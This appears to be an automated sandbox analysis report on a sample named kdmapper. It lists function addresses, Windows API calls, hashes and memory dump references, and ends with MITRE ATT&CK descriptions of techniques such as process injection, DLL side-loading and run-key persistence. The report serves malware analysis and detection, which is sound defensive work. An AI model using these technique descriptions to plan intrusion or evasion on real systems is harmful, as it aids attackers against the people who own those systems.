Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: f3b69b3dc617403991bf8cbac9dc1fde8201547aea4741348db323c41200fb16
Instruction ID: ba246b248a41cbdc65cc07931573d846ff176c64924deaf145c04a813f7ade0a
Opcode Fuzzy Hash: f3b69b3dc617403991bf8cbac9dc1fde8201547aea4741348db323c41200fb16
Instruction Fuzzy Hash: 90311330544785EFE7209B24CC46BDABBD4BB04325F240B1DF9B19A1D1D3A4A998CB92

Function 0017B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0017B8B8

Strings

, xrefs: 0017B8FD

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 46fa55fcdfeff8f5525309d2f89f6a01b2f1db50f162a0635e3c2ae98333022a
Instruction ID: b9fbaf04a65c95feb123f642077229bb93ccc6d99cb6921f6e30c8f4f57f9020
Opcode Fuzzy Hash: 46fa55fcdfeff8f5525309d2f89f6a01b2f1db50f162a0635e3c2ae98333022a
Instruction Fuzzy Hash: 244108B050824C9EDF258E248CD4BFABBB9EB55308F1444EDE6AEC7142D3359A45CB60

Function 0016109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 001610AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 001610B2

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 3fa427e931bad535f003a95104cec0b69be1378ef5491165bc4600489f00641d
Instruction ID: b2b3f92879a5f38be7f3adfd75ed37d6db5cbd4f59bc5bd38573136ddc96c28c
Opcode Fuzzy Hash: 3fa427e931bad535f003a95104cec0b69be1378ef5491165bc4600489f00641d
Instruction Fuzzy Hash: F1E09A32B00249B78F098BA49C158ABB2EDEB442043288179F413E3501FB30EE824BA0

Function 0015A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,0015977F,?,?,001595CF,?,?,?,?,?,00182641,000000FF), ref: 0015A1F1

Part of subcall function 0015BB03: _wcslen.LIBCMT ref: 0015BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0015977F,?,?,001595CF,?,?,?,?,?,00182641), ref: 0015A21F

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: c6f3d100d7b76e959c762991cc33cedc393cb7ffe78847a1ce5e9b0930079036
Instruction ID: d0bf69da012568e17c166152883747004a5eb89a394a46341f8ca5b900ab3bf8
Opcode Fuzzy Hash: c6f3d100d7b76e959c762991cc33cedc393cb7ffe78847a1ce5e9b0930079036
Instruction Fuzzy Hash: BCE0D835140209ABDB019F60EC46FD9379CAF1C7C6F484021BD54D6050EB71DED8EB50

Function 0016081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00160836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015F2D8,Crypt32.dll,00000000,0015F35C,?,?,0015F33E,?,?,?), ref: 00160858

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 2d6923bb16b0abfdaac2732f6ee6bc6c889a9909d9e4fa105786a908bf07b598
Instruction ID: 9381a35ed80a0112e5cb0c5682dd45e38f8dca75afe65e518a8498b7f2d4ace5
Opcode Fuzzy Hash: 2d6923bb16b0abfdaac2732f6ee6bc6c889a9909d9e4fa105786a908bf07b598
Instruction Fuzzy Hash: 8DE012768001186ADB11A794DC45FDA77ACAF09791F0400657A45D2004D774DB948BA0

Function 00151A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00151A09

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2a81f2f9a295af15b29ab2d94201b2756ba1f710e9693c796aa7d95e77388c97
Instruction ID: 6b8ba0d132a0aff4ab7ffe1253e94f24302f1b8f31f3d90bb9faeb628f5a8964
Opcode Fuzzy Hash: 2a81f2f9a295af15b29ab2d94201b2756ba1f710e9693c796aa7d95e77388c97
Instruction Fuzzy Hash: 19C1C730A00254FFDF1ACF64C488BA97BB5AF15311F0801B9EC659F392DB719988CB61

Function 0016B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0016B098

Part of subcall function 001513DC: __EH_prolog.LIBCMT ref: 001513E1

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5032b478fb50703e2465aab26e369b3633639413472ae64e7a59567b8ddd4908
Instruction ID: 497714b7199cd1d757a6d04afc17f7e0983c04440b775e8b0bba9a0e056d0ccf
Opcode Fuzzy Hash: 5032b478fb50703e2465aab26e369b3633639413472ae64e7a59567b8ddd4908
Instruction Fuzzy Hash: 6231AB75804249EECF15DF64DC91AEEBBB4AF19304F1044AEE819B7242DB35AE08CB61

Function 00159215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0015921A

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 677b49130720fd2b688d532bd004c7be60803be9ca8931852933c5576691f167
Instruction ID: ba354f890d29b30bacf0e1bbef0b5c7c50b5bbdccca11dd20f58d883ee748c99
Opcode Fuzzy Hash: 677b49130720fd2b688d532bd004c7be60803be9ca8931852933c5576691f167
Instruction Fuzzy Hash: 3B015273900528EBCF22ABA8CD919DEB775BF98751F014515EC26BF152DB348D0887A1

Function 0017B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00183A34,00000000,?,0017989A,00000001,00000364,?,?,?,0015D984,?,?,?,00000004,0015D710), ref: 0017B177

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7a087fa328b30db3fd43e788f0967a141229354b54d08d24dd417be4d8c1f165
Instruction ID: 7211f0a16ad3543a57650a6e78731dea4b99334fcc7be8bf2daf4b473de17823
Opcode Fuzzy Hash: 7a087fa328b30db3fd43e788f0967a141229354b54d08d24dd417be4d8c1f165
Instruction Fuzzy Hash: 4EF0893254D12577DB255A21BC69B9F7778AF51770B59C211FC0C9B590CF31DE0186E0

Function 001598BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,001597BE), ref: 001598C8

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 8ec2233ba4b51a7e6cf228d7bbeef7a90daa8f4bb1511338c272f5fc2f5fa9c6
Instruction ID: f25c6024631eb204eeb3ed87b52b447b8c5458dff9168981247b8d8f4dc0359e
Opcode Fuzzy Hash: 8ec2233ba4b51a7e6cf228d7bbeef7a90daa8f4bb1511338c272f5fc2f5fa9c6
Instruction Fuzzy Hash: BEC00234404249D68E219A24D84909A7722AB537A77B89694D4798E4A1C326CD9FEB12

Function 0016E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3

Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 67527cfb7deb8e77009274fc53eb167bb088c613b474247ff7e9e79f2a19bc5a
Instruction ID: b4cd3665be87d8a1880f20824e80437fee19f4f5333f088fbd52bc79f4660030
Opcode Fuzzy Hash: 67527cfb7deb8e77009274fc53eb167bb088c613b474247ff7e9e79f2a19bc5a
Instruction Fuzzy Hash: 18B012DE358100BC310831491D12C37014CC1C2B10330C63EFC11D0484DB50AD202C71

Function 0016E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3

Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 416fd4a53674d0d301cc102b3c3e3a8ec51d372c6bd19ca2a42000ed3dc80f5b
Instruction ID: 2f17b29598c3a91f1b071be06be10ae15d424c7344a3ece4a0d2a8a1e5ce294e
Opcode Fuzzy Hash: 416fd4a53674d0d301cc102b3c3e3a8ec51d372c6bd19ca2a42000ed3dc80f5b
Instruction Fuzzy Hash: 65B012DA358000AC314872091D02C37018CC1C2B10331C23EFC15C11C4DB50AD241E71

Function 0016E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3

Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3cf6176e46c5af81ebbc80d3c32ce15cf490a04847558576aa6da6efd92eb78c
Instruction ID: dd3109d3bc593cbb33216722a966f063b3a3baad6f6f1f79bf09aeda7a836a13
Opcode Fuzzy Hash: 3cf6176e46c5af81ebbc80d3c32ce15cf490a04847558576aa6da6efd92eb78c
Instruction Fuzzy Hash: 81B012DE35C100AC3148714D1D02C37018CC1C1B10330823EF815C1084DB606D202E71

Function 0016E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3

Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 05ee5d70c5eb9da49693c153b8738bf29e05647d93b99dee797c7292ac130137
Instruction ID: 664487f9f9cc4cef250582dd1f56c04bbd033f8112e6e26c58dac8974ee17bca
Opcode Fuzzy Hash: 05ee5d70c5eb9da49693c153b8738bf29e05647d93b99dee797c7292ac130137
Instruction Fuzzy Hash: 85B012EA358000BC314871091D02C37018CC5C2F10330C23EFC15C1084DB50AE201D71

Function 0016E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3

Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7facce2d423498d1ac470fa07b5be98facb92ff6d400bb212f248974702b6efe
Instruction ID: fb3654495d902f565c3109d0ac951fe1785d50eee2efa70172db6dd9f96808b8
Opcode Fuzzy Hash: 7facce2d423498d1ac470fa07b5be98facb92ff6d400bb212f248974702b6efe
Instruction Fuzzy Hash: 07B012DA358140BC318872091D02C37018CC1C1B10331C33EF815C11C4DB507D641D71

Function 0016E219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0016E1E3

Part of subcall function 0016E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016E8D0
Part of subcall function 0016E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016E8E1

Memory Dump Source

Source File: 00000005.00000002.1496322573.0000000000151000.00000020.00000001.01000000.00000006.sdmp, Offset: 00150000, based on PE: true

Associated: 00000005.00000002.1496303118.0000000000150000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496365966.0000000000183000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.000000000018E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.0000000000195000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496388636.00000000001B2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1496449215.00000000001B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 510bba7c31f4b5d50a2df96a107e7ad5506b264870d754a5a07e8af06f6fd3e9
Instruction ID: 9bdcd6d53adaf7b28ffb9431251959c306471a7ee5e32e9ff35aef772800093e
Opcode Fuzzy Hash: 510bba7c31f4b5d50a2df96a107e7ad5506b264870d754a5a07e8af06f6fd3e9
Instruction Fuzzy Hash: C9A011EA2A8002BC300832022C02C3B028CC0C2B203308A2EF802C0088AAA028202CB0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
